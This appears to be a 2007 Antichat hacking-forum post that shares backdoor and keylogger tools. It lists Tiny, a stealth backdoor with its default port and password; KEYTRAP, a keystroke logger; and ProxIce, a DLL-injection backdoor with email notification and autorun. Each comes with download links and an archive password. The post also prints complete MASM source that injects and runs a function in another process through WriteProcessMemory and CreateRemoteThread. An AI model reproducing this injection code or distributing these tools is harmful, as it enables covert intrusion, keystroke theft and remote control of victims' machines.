Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   [ASM] BackDoors' sources (https://forum.antichat.xyz/showthread.php?t=49631)

Isis 23.09.2007 00:17
[ASM] BackDoors' sources
 
Tiny v3.2

Цитата:
Tiny is a small backdoor which installs itself in stealth and can be removed again by connecting to it and chosing the correct option from the menu.

Connect to Tiny using netcat since Tiny won't allow you to enter the password using telnet.

Default port is: 63714
Password: Tiny
Download Tiny
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]

[masm] fwb+ example

Код:
Function injection (FWB+) example by shapeless
   
    - http://swerat.com
    - http://chasenet.org
   
    thanks to ksv for the Inject-code :)

^

.386

.model flat, stdcall
option casemap: none

include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\masm32.inc

includelib \masm32\lib\masm32.lib
includelib \masm32\lib\kernel32.lib

FuncSize MACRO L1, L2
        mov eax,L2
        sub eax,L1
    ENDM

TInjData struc
    GetAddr        dword ?
    LoadLib        dword ?
    szUser32    byte 16 dup(0)
    szMsgBox    byte 32 dup(0)
TInjData ends

.data
szApp                db "notepad.exe",0
szUsr32            db "user32.dll",0
szKrnl32            db "kernel32.dll",0
szMsgbox            db "MessageBoxA",0
szLoadLib        db "LoadLibraryA",0
szGetProcAddr db "GetProcAddress",0

.data?
SInfo                STARTUPINFO <>
PInfo                PROCESS_INFORMATION <>
InjData            TInjData <>
pFunc                dword ?
dwThreadID    dword ?
hKernel            dword ?

.code

; Thanks to ksv for c++ example of this code :)
Inject proc uses esi hProcess:dword,dwSize:dword,Code:dword
LOCAL dwOldProtect:dword
LOCAL dwWritten:dword

    invoke VirtualAllocEx,hProcess,0,dwSize,MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
    .if eax==0
        ret
    .endif
    mov esi,eax

    invoke VirtualProtectEx,hProcess,esi,dwSize,PAGE_EXECUTE_READWRITE,addr dwOldProtect
    .if eax==0
        ret
    .endif
   
    invoke WriteProcessMemory,hProcess,esi,Code,dwSize,addr dwWritten
    .if eax==0
        ret
    .endif
   
    mov eax,esi
   
    ret

Inject endp


Label1:

remotefunc PROC uses esi iData:DWORD
; Code:
; invoke Loadlibrary,szUser32
; invoke GetProcAddres,hUser32,szMessagebox
; invoke Messagebox,0,0,0,0

    mov esi,iData
    assume esi:ptr TInjData

    lea ecx,[esi].szUser32
    push ecx
    call [esi].LoadLib
   
    lea ecx,[esi].szMsgBox
    push ecx
    push eax
    call [esi].GetAddr
   
    push 0
    push 0
    push 0
    push 0
    call eax
   
    assume esi:nothing
   
    ret
remotefunc endp

Label2:

__ep:
; create new process
invoke RtlZeroMemory,addr SInfo,SizeOf STARTUPINFO
invoke CreateProcess,0,addr szApp,0,0,FALSE,0,0,0,addr SInfo,addr PInfo

; prep the structure
invoke lstrcpy,addr InjData.szUser32,addr szUsr32
invoke lstrcpy,addr InjData.szMsgBox,addr szMsgbox

invoke GetModuleHandle,addr szKrnl32
mov hKernel,eax

invoke GetProcAddress,hKernel,addr szLoadLib
mov InjData.LoadLib,eax

invoke GetProcAddress,hKernel,addr szGetProcAddr
mov InjData.GetAddr,eax


; inject function
FuncSize Label1,Label2
invoke Inject,PInfo.hProcess,eax,offset remotefunc
jz EOF
mov pFunc,eax

; inject the structure
invoke Inject,PInfo.hProcess,sizeof TInjData,offset InjData
jz EOF

invoke CreateRemoteThread,PInfo.hProcess,0,0,pFunc,eax,0,addr dwThreadID

EOF:

invoke ExitProcess,0
end __ep

KEYTRAP

Цитата:
KEYTRAP v1.0 - Keyboard Key Logger
By Dcypher (Dcypher@aol.com)

Usage: KEYTRAP <dir\logfile> /A /B /C

A - Maximum size of log file.
B - Number of keys to log per session.
C - Minutes between each session.
Download Keytrap
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]


ProxIce 2.0 - backdoor DLL injection

Цитата:
First of all, thank you to use this program

Writing 100% pure ASM, with MASM & WinASM.

Functions:
- Injection of a thread which him even load a DLL infectious
- Encoding of the data inside the waiter
- Password not deciphered in memory
- Notification by email
- EditServer
- Installation in one cl?e of the BDR for autorun
- Test of connection
- Backdoor on the port of your choice
- Total Comment of the sources

This program was concu and programmed for the mag #1 of n0name, thank you has
Aphex for the type of injection, and? it is all. Thank you bleyme has for
to have thrown an eye on my sources, thank you in fact has all the TEAM n0name
to be what it is? this backdoor is the proof that one can
quickly to make a backdoor simple, effective, and so much is little
furtive of very small size? the sources are A titrates educational
and will allow has those which wish it to learn a little while including/understanding
why and what is done.

You will need NetCat to connect you to the waiter, delivered with
the pack. With the fact, this backdoor is concue for XP/NT.

Amuse well

Download ProxIce
Пароль на архив: hufY%S#fsy76S$ - [xeka.ru]


Время: 11:36